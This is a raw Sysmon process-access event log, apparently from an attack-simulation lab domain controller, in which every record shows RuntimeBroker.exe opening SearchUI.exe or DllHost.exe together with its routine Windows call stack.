13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.523{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.523{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.336{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.336{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.320{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.320{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 